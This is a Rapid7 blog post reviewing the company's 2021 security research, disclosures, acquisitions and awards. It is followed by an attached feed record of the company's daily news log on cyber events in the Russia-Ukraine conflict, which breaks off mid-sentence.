Now that 2022 is fully underway, it's time to wrap up some of the milestones that Rapid7 achieved in 2021. We worked harder than ever last year to help protectors keep their organization's infrastructure secure — even in the face of [some of the most difficult threats](<https://www.rapid7.com/log4j-cve-2021-44228-customer-resources/>) the security community has dealt with in recent memory. Here's a rundown of some of our biggest moments in that effort from 2021.
## Emergent threats and vulnerability disclosures
As always, our Research and Emergent Threat Response teams spent countless hours this year tirelessly bringing you need-to-know information about the most impactful late-breaking security exploits and vulnerabilities. Let's revisit some of the highlights.
### Emergent threat reports
* [Widespread Exploitation of Critical Remote Code Execution in Apache Log4j](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>)
* [CVE-2021-34527 (PrintNightmare): What You Need to Know](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)
* [GitLab Unauthenticated Remote Code Execution CVE-2021-22205 Exploited in the Wild](<https://www.rapid7.com/blog/post/2021/11/01/gitlab-unauthenticated-remote-code-execution-cve-2021-22205-exploited-in-the-wild/>)
* [Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>)
* [Microsoft SAM File Readability CVE-2021-36934: What You Need to Know](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>)
* [ProxyShell: More Widespread Exploitation of Microsoft Exchange Servers](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>)
### Vulnerability disclosures
* [CVE-2021-3546[78]: Akkadian Console Server Vulnerabilities (FIXED)](<https://www.rapid7.com/blog/post/2021/09/07/cve-2021-3546-78-akkadian-console-server-vulnerabilities-fixed/>)
* [Fortinet FortiWeb OS Command Injection](<https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/>)
* [CVE-2020-7387..7390: Multiple Sage X3 Vulnerabilities](<https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/>)
## Research and policy highlights
That's not all our Research team was up to in 2021. They also churned out a wealth of content and resources weighing in on issues of industry-wide, national, and international importance.
* We published several reports on the state of cybersecurity, including:
* Our [2020 Vulnerability Intelligence Report](<https://www.rapid7.com/blog/post/2021/03/11/introducing-the-vulnerability-intelligence-report-50-cves-that-made-headlines-in-2020/>)
* Our latest [Industry Cyber-Exposure Report (ICER)](<https://www.rapid7.com/blog/post/2021/05/05/rapid7-releases-new-industry-cyber-exposure-report-icer-asx-200/>)
* Our [2021 Cloud Misconfigurations Report](<https://www.rapid7.com/info/2021-cloud-misconfigurations-research-report/>)
* We tackled the [hot-button topic of hack back](<https://www.rapid7.com/blog/post/2021/08/10/hack-back-is-still-wack/>) and discussed whether or not the practice is, in fact, wack. (Spoiler: It is.)
* We unpacked the implications for [cybersecurity in the US Infrastructure Bill](<https://www.rapid7.com/blog/post/2021/08/31/cybersecurity-in-the-infrastructure-bill/>).
* We highlighted the reasons why we think the [UK's Computer Misuse Act](<https://www.rapid7.com/blog/post/2021/08/12/reforming-the-uks-computer-misuse-act/>) needs some revising.
* We launched [Project Doppler](<https://www.rapid7.com/research/project-doppler/>), a free tool for Rapid7 customers, developed by our Research team to help organizations get better insight into their public internet exposure.
## The Rapid7 family keeps growing
Throughout 2021, we made some strategic acquisitions to broaden the solutions we offer and help make the [Insight Platform](<https://www.rapid7.com/products/insight-platform/>) the one-stop shop for your security program.
* [We acquired IntSights](<https://www.rapid7.com/blog/post/2021/07/19/rapid7-acquires-intsights/>) to help organizations obtain holistic threat intelligence.
* [We teamed up with open-source platform Velociraptor](<https://www.rapid7.com/blog/post/2021/04/21/rapid7-and-velociraptor-join-forces/>) to provide teams with better endpoint visibility.
* [We brought Kubernetes security provider Alcide](<https://www.rapid7.com/blog/post/2021/02/01/rapid7-acquires-leading-kubernetes-security-provider-alcide/>) under the Rapid7 umbrella to add more robust cloud security capabilities to InsightCloudSec.
## Industry accolades
We're always thrilled to get industry recognition for the work we do helping protectors secure their organizations — and we had a few big nods to celebrate in 2021.
* Gartner once again [named us a Leader](<https://www.rapid7.com/blog/post/2021/08/23/rapid7-mdr-named-a-market-leader-again/>) in its Magic Quadrant for Managed Detection and Response (MDR).
* We also earned recognition as a Strong Performer in the [inaugural Forrester Wave for MDR](<https://www.rapid7.com/blog/post/2021/03/24/rapid7-recognized-as-a-strong-performer-in-the-inaugural-forrester-wave-for-mdr-q1-2021/>).
* InsightIDR was recognized by Gartner us as a [Leader in SIEM](<https://www.rapid7.com/blog/post/2021/07/06/once-again-rapid7-named-a-leader-in-2021-gartner-magic-quadrant-for-siem/>) for the second time in a row.
* For its 2021 Dynamic Application Security Testing (DAST) Magic Quadrant, Gartner [named us a Visionary](<https://www.rapid7.com/blog/post/2021/06/01/rapid7-named-a-visionary-in-2021-gartner-magic-quadrant-for-application-security-testing/>).
## Keeping in touch
Clearly, we had a pretty busy 2021 — and we have even more planned for 2022. If you need the latest and greatest in security content to tide you over throughout the last few weeks of the year, we have a few ideas for you.
* Listen to the [latest season of Security Nation](<https://www.rapid7.com/blog/series/security-nation/security-nation-season-4/>), our podcast where we chat with amazing guests from all corners of the security community. Season 5 launches later this month!
* Put the finishing touches on your cybersecurity program for the coming year with insights from our [2022 Planning series](<https://www.rapid7.com/blog/tag/2022-planning/>).
* Get better acquainted with the latest application security threats with our series on the [OWASP Top 10 for 2021](<https://www.rapid7.com/blog/tag/owasp-top-10-2021/>).
* Read up on why [InsightIDR was XDR before it was cool to be XDR](<https://www.rapid7.com/blog/post/2021/11/09/insightidr-was-xdr-before-xdr-was-even-a-thing-an-origin-story/>).
Stay tuned for more great content, research, and much more in 2022!
#### NEVER MISS A BLOG
Get the latest stories, expertise, and news about security today.
Subscribe
{"rapid7blog": [{"lastseen": "2022-03-16T21:28:40", "description": "\n\nCyberattacks are a distinct concern in the [Russia-Ukraine conflict](<https://www.rapid7.com/blog/tag/russia-ukraine-conflict/>), with the potential to impact individuals and organizations far beyond the physical frontlines. With events unfolding rapidly, we want to provide a single channel by which we can communicate to the security community the major cyber-related developments from the conflict each day.\n\nEach business day, we will update this blog at 5 pm EST with what we believe are the need-to-know updates in cybersecurity and threat intelligence relating to the Russia-Ukraine conflict. We hope this blog will make it easier for you to stay current with these events during an uncertain and quickly changing time.\n\n* * *\n\n## March 16, 2022\n\nUkrainian President Volodymyr Zelenskyy [delivered a virtual speech](<https://www.nbcnews.com/politics/congress/zelenskyy-expected-press-us-military-support-address-congress-rcna20088>) to US lawmakers on Wednesday, asking again specifically for a no-fly zone over Ukraine and for additional support. \n\nThe White House released a new [fact sheet](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/16/fact-sheet-on-u-s-security-assistance-for-ukraine/>) detailing an additional $800 million in security assistance to Ukraine. \n\n**Threat Intelligence Update**\n\n * ******UAC-0056 targets Ukrainian entities******\n\nSentinelOne researchers reported that UAC-0056 targeted Ukrainian entities using a malicious Python-based package, masquerading as a Ukrainian language translation software. Once installed, the fake app deployed various malware, such as Cobalt Strike, GrimPlant, and GraphSteel.\n\n_Source: [Sentinel One](<https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/>)_\n\n * ******A ****h****acker was caught routing calls to Russian troops******\n\nThe Security Service of Ukraine claimed to have arrested a hacker that helped deliver communications from within Russia to the Russian troops operating in the Ukrainian territory. The hacker also sent text messages to\n\nUkrainian security officers and civil servants, exhorting them to surrender.\n\n_Source: [The Verge](<https://www.theverge.com/2022/3/15/22979381/phone-relay-capture-russia-military-unencrypted-communications-ukraine>)_\n\n## March 15, 2022\n\nThe Ukrainian Ministry of Defense [leaked documents](<https://www.scmagazine.com/analysis/breach/in-a-first-ukraine-leaks-russian-intellectual-property-as-act-of-war>) of a Russian nuclear power plant. This may be the first-ever instance of a hack-and-leak operation to weaponize the disclosure of intellectual property to harm a nation.\n\nResearchers at INFOdocket, a subsidiary of [Library Journal](<https://en.wikipedia.org/wiki/Library_Journal>), have [created](<https://www.infodocket.com/2022/03/10/briefings-reports-and-updates-about-the-conflict-in-ukraine-from-the-congressional-research-service-european-parliament-research-service-and-uk-house-of-commons-library/>) a compendium of briefings, reports, and updates about the conflict in Ukraine from three research organizations: Congressional Research Service (CRS), European Parliament Research Service (EPRS), and the UK House of Commons Library. The resource will be updated as each of the three organizations releases relevant new content.\n\nThe Wall Street Journal [is reporting](<https://www.wsj.com/articles/russian-prosecutors-warn-western-companies-of-arrests-asset-seizures-11647206193>) that Russian prosecutors have issued warnings to Western companies in Russia, threatening to arrest corporate leaders there who criticize the government or to seize assets of companies that withdraw from the country. \n\nRussia may [default on $117 million (USD) in interest payments](<https://qz.com/2142075/sanctions-are-likely-to-force-russia-to-default-on-foreign-debt/>) on dollar-denominated bonds due to Western sanctions, the first foreign debt default by Russia since 1918.\n\nReuters is [reporting](<https://www.usnews.com/news/world/articles/2022-03-14/russian-delegation-suspends-participation-in-council-of-europe-body-ria>) that Russia's delegation to the Parliamentary Assembly of the Council of Europe (PACE) is suspending its participation and will not take part in meetings. \n\nCNN [reports](<https://www.cnn.com/europe/live-news/ukraine-russia-putin-news-03-15-22/h_3f0d63658ac5c2875ed265df00ba8b40>) that Russia has imposed sanctions against US President Joe Biden, his son, Secretary of State Antony Blinken, other US officials, and \u201cindividuals associated with them,\u201d the Russian Foreign Ministry said in a statement on Tuesday.\n\n**Threat Intelligence Update**\n\n * ******Russian ****s****tate-****s****ponsored ****c****yber ****a****ctors ****a****ccess ****n****etwork ****m****isconfigured with ****d****efault MFA ****p****rotocols******\n\nCISA and the Federal Bureau of Investigation (FBI) have released a joint Cybersecurity Advisory that details how Russian state-sponsored cyber actors accessed a network with misconfigured default multifactor authentication (MFA) protocols. The actors then exploited a critical Windows Print Spooler vulnerability, [\u201cPrintNightmare\u201d (CVE-2021-34527)](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>), to run arbitrary code with system privileges.\n\n_Source: [CISA](<https://www.cisa.gov/uscert/ncas/current-activity/2022/03/15/russian-state-sponsored-cyber-actors-access-network-misconfigured>)_\n\n * ******Fake antivirus updates used to deploy Cobalt Strike in Ukraine******\n\nUkraine's Computer Emergency Response Team is warning that threat actors are distributing fake Windows antivirus updates that install Cobalt Strike and other malware. The phishing emails impersonate Ukrainian government agencies offering ways to increase network security and advise recipients to download \"critical security updates,\" which come in the form of a 60 MB file named \"BitdefenderWindowsUpdatePackage.exe.\"\n\n_Source: [BleepingComputer/CERT-UA](<https://www.bleepingcomputer.com/news/security/fake-antivirus-updates-used-to-deploy-cobalt-strike-in-ukraine/amp/>)_\n\n * ******A ****n****ovel ****w****iper ****t****argets Ukrainian ****e****ntities******\n\nCybersecurity researchers observed the new CaddyWiper malware targeting Ukrainian organizations. Once deployed, CaddyWiper destroys and overwrites the data from any drives that are attached to the compromised system. Despite being released in close proximity to other wiping malware targeting Ukraine, such as HermeticWiper and IsaacWiper, CaddyWiper does not share any significant code similarities with them and appears to be created separately.\n\n_Source:[ Bleeping Computer](<https://www.bleepingcomputer.com/news/security/new-caddywiper-data-wiping-malware-hits-ukrainian-networks/amp/>)_\n\n * ******German Federal Office for Information Security ****a****gency ****i****ssues an ****a****lert for Russian ****a****ntivirus ****s****oftware Kaspersky******\n\nThe German Federal Office for Information Security agency (BSI) issued an alert urging its citizens to replace Kaspersky antivirus software with another defense solution, due to alleged ties to the Kremlin. The agency suggested Kaspersky could be used as a tool in the cyber conflict between Russia and Ukraine.\n\n_Source:[ BSI](<https://www.bsi.bund.de/DE/Service-Navi/Presse/Pressemitteilungen/Presse2022/220315_Kaspersky-Warnung.html>)_\n\n## March 14, 2022\n\nThe EU-based NEXTA media group has [reported](<https://twitter.com/nexta_tv/status/1503393046351781892?s=20&t=1tA7lZrLVe-cZpHb9wy2LA>) that Russia is starting to block VPN services.\n\nBermuda\u2019s aviation regulator [said](<https://financialpost.com/pmn/business-pmn/bermuda-revokes-licenses-for-russian-operated-planes-over-safety-concerns>) it is suspending certification of all Russian-operated airplanes registered in the British overseas territory due to international sanctions over the war in Ukraine, in a move expected to affect more than 700 planes.\n\nThe Washington Post [reported](<https://www.washingtonpost.com/world/2022/03/12/russia-putin-google-apple-navalny/>) that Federal Security Service (FSB), Russian Federalnaya Sluzhba Bezopasnosti, agents approached Google and Apple executives with requests to remove apps created by activist groups.\n\nAmnesty International [said](<https://www.amnesty.org/en/latest/news/2022/03/russia-authorities-block-amnesty-internationals-russian-language-website/>) Russian authorities have blocked their Russian-language website. \n\n**Threat Intelligence Update**\n\n * ******Anonymous claims to hack Rosneft, German subsidiary of Russian energy******\n\nAnonymous claimed to hack the German branch of the Russian energy giant Rosneft, allegedly stealing 20 TB of data. The company systems were significantly affected by the attack, although there currently seems to be no effect on the company's energy supply.\n\n_Source:[ Security Affairs](<https://securityaffairs.co/wordpress/129052/hacktivism/anonymous-hacked-german-subsidiary-rosneft.html>)_\n\n * ******Russia blocks access to Instagram nationwide******\n\nRussia's Internet moderator Roskomnadzor decided to block Instagram access in the country, following Meta's decision to allow \"calls for violence against Russian citizens.\" The federal agency gave Instagram users 48 hours to prepare and finally completed the act on March 13. The blocking of Instagram follows the former ban of Facebook and Twitter in Russia last week.\n\n_Source:[ Cyber News](<https://cybernews.com/cyber-war/instagram-is-no-longer-accessible-in-russia/?utm_source=youtube&utm_medium=cn&utm_campaign=news_CNN_047_instagram_blocked_in_russia&utm_term=2v1_yubOBMc&utm_content=direct_article>)_\n\n## March 11, 2022\n\nPresident Biden, along with the European Union and the Group of Seven Countries, [moved](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/11/fact-sheet-united-states-european-union-and-g7-to-announce-further-economic-costs-on-russia/>) to revoke \u201cmost favored nation\u201d trade status for Russia, deny borrowing privileges at multilateral financial institutions, apply sanctions to additional Russian elites, ban export of luxury goods to Russia, and ban US import of goods from several signature sectors of Russia\u2019s economy.\n\n**Threat Intelligence Update**\n\n * **Amid difficulties with renewing certificates, Russia has created its own trusted TLS certificate authority**\n\nSigning authorities based in countries that have imposed sanctions on Russia can no longer accept payments for their services, leaving many sites with no practical means to renew expiring certificates. As a result, the Russian Ministry of Digital Development announced the availability of domestic certificates, replacing expired or revoked foreign certificates.\n\n_Source: [Bleeping Computer](<https://www.bleepingcomputer.com/news/security/russia-creates-its-own-tls-certificate-authority-to-bypass-sanctions/>)_\n\n * ******Triolan, ****a**** major Ukrainian internet service provider****,**** was hacked \u2014 twice******\n\nTriolan, a Ukraine-based ISP with more than half a million subscribers, was reportedly hacked initially on February 24th, with a second attack hitting on March 9th. The company reported that the threat actors managed to hack into key components of the network, some of which couldn\u2019t be recovered.\n\n_Source: [Forbes](<https://www.forbes.com/sites/thomasbrewster/2022/03/10/cyberattack-on-major-ukraine-internet-provider-causes-major-outages/?sh=768d17596573>)_\n\n## March 10, 2022\n\nBy [order of President Putin](<https://twitter.com/KevinRothrock/status/1501935395092631556?s=20&t=TvFRrQvNfQ6OL3qvFJePQg>), Russia\u2019s Economic Development Ministry has drafted a bill that would effectively nationalize assets and businesses \"abandoned\" in Russia by foreign corporations. Management of these seized assets will be entrusted to the VEB.RF state development corporation and to Russia\u2019s Deposit Insurance Agency.\n\nRussia has [effectively legalized patent theft](<http://publication.pravo.gov.ru/Document/View/0001202203070005?index=0&rangeSize=1>) from anyone affiliated with countries \u201cunfriendly\u201d to it, declaring that unauthorized use will not be compensated. The Russian news agency Tass has [further reporting](<https://tass.ru/ekonomika/13982403>) on this, as does the [Washington Post](<https://www.washingtonpost.com/business/2022/03/09/russia-allows-patent-theft/>).\n\nGoldman Sachs Group Inc [announced it was closing its operations in Russia](<https://www.reuters.com/business/finance/goldman-sachs-exit-russia-bloomberg-news-2022-03-10/>), becoming the first major Wall Street bank to exit the country following Moscow's invasion of Ukraine.\n\nUK Foreign Secretary Liz Truss [announced](<https://www.gov.uk/government/news/abramovich-and-deripaska-among-seven-oligarchs-targeted-in-estimated-15bn-sanction-hit>) a full asset freeze and travel ban on seven of Russia\u2019s wealthiest and most influential oligarchs, whose business empires, wealth, and connections are closely associated with the Kremlin.\n\nUS Vice President Kamala Harris [announced](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/10/vice-president-kamala-harris-announces-additional-u-s-funding-to-respond-to-humanitarian-needs-in-ukraine-and-eastern-europe/>) nearly $53 million in new humanitarian assistance from the United States government, through the US Agency for International Development (USAID), to support innocent civilians affected by Russia\u2019s invasion of Ukraine.\n\nThe International Atomic Energy Agency (IAEA) [provided an update](<https://www.iaea.org/newscenter/pressreleases/update-17-iaea-director-general-statement-on-situation-in-ukraine>) on the situation at the Chernobyl Nuclear Power Plant. The IAEA Director General said that the Agency is aware of reports that power has now been restored to the site and is looking for confirmation. At the same time, Ukraine informed them that today it had lost all communications with the facility. The IAEA has assured the international community that there has been \u201cno impact on essential safety systems.\u201d\n\n**Threat Intelligence Update**\n\n * **New malware variant targeting Russia named RURansom**\n\nRURansom is a malware variant that was recently discovered and appears to be targeting Russia. While it was initially suspected of being a ransomware, further analysis suggests it is actually a wiper. So far, no active non-Russian targets have been identified, likely due to the malware targeting specific entities.\n\n_Source: [TrendMicro](<https://www.trendmicro.com/en_us/research/22/c/new-ruransom-wiper-targets-russia.html>)_\n\n_Available in Threat Library as: RURansom_\n\n * ******Kaspersky source code leak seems to be just a collection of publicly available HTML files******\n\nThe hacking group NB65 claimed on social networks to have leaked source code from the Russian antivirus firm Kaspersky. However, it appears that the leaked files are nothing more than a long list of HTML files and other related, publicly available web resources.\n\n_Source: [Cybernews](<https://cybernews.com/cyber-war/long-awaited-kaspersky-leak-doesnt-seem-to-be-a-leak-at-all/>)_\n\n * ******Anonymous claims to hack Roskomnadzor, a Russian federal agency******\n\nHacktivist group Anonymous claims to have breached Roskomnadzor, a Russian federal agency responsible for monitoring, controlling, and censoring Russian mass media, leaking over 360,000 (817.5 GB) files. Based on the report, the leak contains relatively recent censored documents, dated as late as March 5, and demonstrates Russia\u2019s attempts to censor media related to the conflict in Ukraine.\n\n_Source: @AnonOpsSE via [Twitter](<https://twitter.com/AnonOpsSE/status/1501944150794506256>) _\n\n## March 9, 2022\n\n**Public policy:** Citing concerns over rising cybersecurity risks related to the Russia-Ukraine conflict, the US is poised to enact new cyber incident reporting requirements. The_ _[Cyber Incident Reporting for Critical Infrastructure Act of 2022](<https://www.congress.gov/bill/117th-congress/senate-bill/3600/text?q=%7B%22search%22%3A%5B%22s+3600%22%2C%22s%22%2C%223600%22%5D%7D&r=3&s=2>):\n\n * Will require critical-infrastructure owners and operators to report cybersecurity incidents to CISA within 72 hours of determining the incident is significant enough that reporting is required;\n * Will require critical infrastructure owners and operators to report ransomware payments to CISA within 24 hours; and\n * Is intended to give federal agencies more insight into attack trends and potentially provide early warnings of major vulnerabilities or attacks in progress before they spread.\n\nThe Bank of Russia [established](<https://www.cbr.ru/eng/press/event/?id=12744>) temporary procedures for foreign cash transactions, suspending sales of foreign currencies until September 9, 2022. Foreign currency accounts are limited to withdrawals up to $10,000 USD.\n\nThe Financial Crimes Enforcement Network (FinCEN) is [alerting all financial institutions](<https://www.fincen.gov/index.php/news/news-releases/fincen-advises-increased-vigilance-potential-russian-sanctions-evasion-attempts>) to be vigilant against efforts to evade the expansive sanctions and other US-imposed restrictions implemented in connection with the Russian Federation\u2019s further invasion of Ukraine.\n\nThe Pentagon [dismissed](<https://www.cnn.com/2022/03/08/politics/poland-jets-ukraine-russia/index.html>) Poland\u2019s offer to transfer MIG-29 fighter jets to the United States for delivery to Ukraine, stating they did not believe the proposal was \u201ctenable.\u201d\n\n**Threat Intelligence Update**\n\n * ******Multiple hacking groups target Ukrainians and other European ****a****llies via ****p****hishing ****a****ttacks******\n\nSeveral threat actors, including Fancy Bear, Ghostwriter, and Mustang Panda, have launched a large phishing campaign against Ukraine, Poland, and other European entities amid Russia's invasion of Ukraine. \n\n_Source: [The Hacker News](<https://thehackernews.com/2022/03/google-russian-hackers-target.html>)_\n\n_Available in Threat Library as: APT28 (Fancy Bear), Ghostwriter, Mustang Panda_\n\n * ******The Conti Ransomware group resumes activity following leaks******\n\nThe Conti Ransomware group appears to have made a comeback following the [leak of its internal chats last week](<https://www.rapid7.com/blog/post/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/>). On March 9, Rapid7 Threat Intelligence observed renewed activity on Conti\u2019s onion site, and CISA released new IOCs related to the group on their Conti alert page.\n\n_Source: [CISA](<https://www.cisa.gov/uscert/ncas/alerts/aa21-265a>)_\n\n_Available in Threat Library as: Conti_\n\n * ******The Belarusian group UNC1151 targets Ukrainian organizations using MicroBackdoor malware******\n\nThe Ukrainian government has reported on a continuous cyberattack on state organizations of Ukraine using malicious software Formbook.\n\n_Source: [Ukrainian CERT](<https://cert.gov.ua/article/37626>)_\n\n_Available in Threat Library as: UNC1151_\n\n## March 8, 2022\n\nThe US [announced](<https://www.whitehouse.gov/briefing-room/presidential-actions/2022/03/08/executive-order-on-use-of-project-labor-agreements-for-federal-construction-projects-2/>) a ban on imports of Russian oil, gas, and other energy products. New US investments in the Russian energy sector are also restricted. The UK [announced](<https://www.gov.uk/government/news/uk-to-phase-out-russian-oil-imports>) it would phase out Russian oil over 2022. \n\nThe International Atomic Energy Agency [published a statement](<https://www.iaea.org/newscenter/pressreleases/update-15-iaea-director-general-statement-on-situation-in-ukraine>) noting that remote data transmission from monitoring systems at Ukraine\u2019s mothballed Chernobyl nuclear power plant has been lost. No network data has been observed by internet monitoring companies since March 5, 2022.\n\nChris Chivvis, a senior fellow and director of the American Statecraft Program at the Carnegie Endowment for International Peace, has provided [an assessment](<https://carnegieendowment.org/2022/03/03/how-does-this-end-pub-86570>) of two likely trajectories in the Russia-Ukraine conflict. \n\nTwitter [announced](<https://twitter.com/AlecMuffett/status/1501282223009542151?s=20&t=tO-TNZw5ct6tZUcwyvMl4A>) they have made their social network available on the Tor Project onion service, which will enable greater privacy, integrity, trust, and availability to global users.\n\nThe Minister of Foreign Affairs of the Republic of Poland [announced](<https://www.gov.pl/web/diplomacy/statement-of-the-minister-of-foreign-affairs-of-the-republic-of-poland-in-connection-with-the-statement-by-the-us-secretary-of-state-on-providing-airplanes-to-ukraine>) they are ready to deploy \u2014 immediately and free of charge \u2014 all their MIG-29 jets to the Ramstein Air Force base and place them at the disposal of the US government.\n\nLumen [announced](<https://news.lumen.com/RussiaUkraine>) they are immediately ceasing their limited operations in Russia and will no longer provide services to local Lumen enterprise customers.\n\nMcDonald\u2019s [announced](<https://www.cnbc.com/2022/03/08/mcdonalds-will-temporarily-close-850-restaurants-in-russia-nearly-2-weeks-after-putin-invaded-ukraine.html>) they have temporarily closed 850 restaurants in Russia in response to Russia\u2019s attack on Ukraine.\n\nStarbucks [has announced](<https://www.cnbc.com/2022/03/08/starbucks-suspends-all-business-in-russia-as-putins-forces-attack-ukraine.html>) they will be suspending all business in Russia in response to Russia\u2019s attack on Ukraine.\n\n**Threat Intelligence Update**\n\n * ******52 US organizations were impacted by RagnarLocker ransomware****,**** including critical infrastructures******\n\nThe FBI reported that as of January 2021, 52 US-based organizations, some related to critical infrastructure, were affected by RagnarLocker ransomware. The industries affected include manufacturing, energy, financial services, government, and information technology. The malware code excludes execution on post-Soviet Union countries, including Russia, based on a geolocation indicator embedded in its code.\n\n_Source: [FBI FLASH](<https://www.ic3.gov/Media/News/2022/220307.pdf>) _\n\n_Available in Threat Library as: Ragnar Locker_\n\n * ******US energy companies were attacked prior to the Russian invasion to Ukraine******\n\nDuring a two-week blitz in mid-February, hackers received access to dozens of computers belonging to multiple US-based energy companies, including [Chevron Corp.](<https://www.bloomberg.com/quote/CVX:US>), [Cheniere Energy Inc.](<https://www.bloomberg.com/quote/LNG:US>), and [Kinder Morgan Inc](<https://www.bloomberg.com/quote/KMI:US>). The companies were attacked in parallel to the Russian invasion of Ukraine.\n\n_Source: [Bloomberg](<https://www.bloomberg.com/news/articles/2022-03-07/hackers-targeted-u-s-lng-producers-in-run-up-to-war-in-ukraine>)_\n\n * **European officials were hacked by Chinese threat actors amid the conflict in Ukraine**\n\nAccording to Google and Proofpoint, a cyberattack was launched by the Chinese hacking group Mustang Panda and its affiliated group RedDelta, which usually targets Southeast Asian countries. The groups managed to gain access to an unidentified European NATO-member email account and spread malware to other diplomatic offices.\n\n_Source: [Forbes](<https://www.forbes.com/sites/thomasbrewster/2022/03/08/chinese-hackers-ramp-up-europe-attacks-in-time-with-russia-ukraine-war/?sh=6077d22f5ee1>)_\n\n_Available in Threat Library as: Mustang Panda_ \n\n\n * ******#OpAmerica: DEVLIX_EU, a pro-Russian hacktivist group, and its affiliates claim to have gained access to terabytes of US sensitive data ******\n\nThe group claims they have obtained access to 92TB of data related to the US Army. According to the group, they also hacked into four of the biggest \u201chosts\u201d in the US and 49 TB of data. As of now, there is no real evidence for the attack provided by the group.\n\n_Source: @Ex_anon_W_hater via [Twitter](<https://twitter.com/Ex_anon_W_hater/status/1500858398664888325>)_\n\n## March 7, 2022\n\nNetflix, KPMG, PwC, and EY have [cut ties with local units in Russia,](<https://www.reuters.com/business/netflix-kpmg-pwc-amex-sever-ties-with-russia-2022-03-06/>) and Danone suspended investments in Russia.\n\nThe Russian government has [published a list of foreign states](<https://www.jpost.com/international/article-700559>) that have committed \u201cunfriendly actions\u201d against \u201cRussia, Russian companies, and citizens.\u201d Countries listed include Australia, Albania, Andorra, the United Kingdom, the member states of the European Union, Iceland, Canada, Liechtenstein, Micronesia, Monaco, New Zealand, Norway, Republic of Korea, San Marino, North Macedonia, Singapore, USA, Taiwan, Ukraine, Montenegro, Switzerland, and Japan.\n\nThe Russian government\u2019s Ministry of Digital [issued orders](<https://www.kommersant.ru/doc/5249500>) for all government websites to use only domestic hosting providers and DNS. They further instructed agencies to discontinue using non-Russian third-party tooling, such as Google Analytics.\n\nTikTok is [suspending content from Russia](<https://www.buzzfeednews.com/article/krystieyandoli/tiktok-russia-suspending-media>) in response to the country cracking down on reporting about the invasion of Ukraine.\n\n**Threat Intelligence Update**\n\n * **Anonymous-affiliated threat actor claims to have hacked and shut down water infrastructure in Russia**\n\nThe AnonGhost group claims to have hacked and shut down two Russian SCADA water supply systems impacting the Russian cities: Volkhov, Boksitogorsk, Luga, Slantsevsky, Tikhvinsky, and Vyborg.\n\n_Source: @darkowlcyber via [Twitter](<https://twitter.com/darkowlcyber/status/1500552186735910915?s=20&t=zXmKgw6Om_VQMHa6XmN6RQ>)_\n\n_Available in Threat Library as: AnonGhost (for Threat Command customers who want to learn more)_ \n\n\n * **Anonymous claims to hack Russian TV services to broadcast footage of the war with Ukraine**\n\nRussian live TV channels Russia 24, Channel One, and Moscow 24, as well as Wink and Ivi, Netflix like services, have been hacked to broadcast footage of the war with Ukraine according to Anonymous.\n\n_Source: @YourAnonNews via [Twitter](<https://twitter.com/YourAnonNews/status/1500613013510008836?s=20&t=qgOO0Uu5T2UrkqdbjEJeAg>)_\n\n## March 4, 2022\n\nThe NATO Cooperative Cyber Defence Center of Excellence (CCDCOE) announced that [Ukraine will join the group](<https://news.yahoo.com/ukraine-join-nato-cyber-defence-171835083.html>) as a \u201ccontributing participant,\u201d indicating that \u201cUkraine could bring valuable first-hand knowledge of several adversaries within the cyber domain to be used for research, exercises, and training.\u201d\n\nUkraine\u2019s deputy chief of their information protection service [noted in a Friday briefing](<https://www.bloomberg.com/news/articles/2022-03-04/ukraine-s-hacker-army-said-to-be-helped-by-400-000-supporters>) that over 400,000 individuals have volunteered to help a crowdsourced Ukrainian government effort to disrupt Russian government and military targets.\n\n**Threat Intelligence Update**\n\n * ******Russia blocked access to social media platforms and Western news sites******\n\nRussia has prevented its residents access to information channels, including Facebook, Twitter, Western news sites such as the BBC, and app stores. With that, the BBC is now providing access to its website via the Dark Web and has reinstated their BBC shortwave broadcast service.\n\n_Source: [Reuters](<https://www.reuters.com/business/russias-offer-foreign-firms-stay-leave-or-hand-over-keys-2022-03-04/>)_\n\n * **Anonymous-affiliated threat actor hacked and leaked data from the Russian Federal State Budgetary Institution of Science**\n\nThe Russian Federal Guard Service of the Russian Federation was hacked by Anonymous. The hacker published leaked names, usernames, emails, and hashed passwords of people from the institution.\n\n_Source: @PucksReturn via [Twitter](<https://twitter.com/PucksReturn/status/1499757796526542855?s=20&t=LQqanSu2v7L5ONAkpZT1PA>)_\n\n * **Anonymous takes down multiple Russian government websites**\n\nAnonymous claims responsibility for the takedown of a large number of Russian Government websites including one of the main government websites, gov.ru. Most of the websites are still down as of Friday afternoon, March 4.\n\n_Source: @Anonynewsitaly via [Twitter](<https://twitter.com/Anonynewsitaly/status/1499488100405362694?s=20&t=92-u27VSsZLoTAz1KtuOKA>)_\n\n## March 3, 2022\n\n**Additional sanctions:** The US Treasury Dept. [announced another round of sanctions](<https://home.treasury.gov/news/press-releases/jy0628>) on Russian elites, as well as many organizations it characterized as outlets of disinformation and propaganda.\n\n**Public policy:** The Russia-Ukraine conflict is adding momentum to cybersecurity regulatory actions. Most recently, that includes\n\n * **[Incident reporting law](<https://www.hsgac.senate.gov/media/majority-media/senate-passes-peters-and-portman-landmark-legislative-package-to-strengthen-public-and-private-sector-cybersecurity->): **Citing the need to defend against potential retaliatory attacks from Russia, the US Senate passed a bill to require critical infrastructure owners and operators to report significant cybersecurity incidents to CISA, as well as ransomware payments. The US House is now considering fast-tracking this bill, which means it may become law quite soon.\n * **[FCC inquiry on BGP security](<https://www.fcc.gov/document/fcc-launches-inquiry-internet-routing-vulnerabilities>): **\u201c[E]specially in light of Russia\u2019s escalating 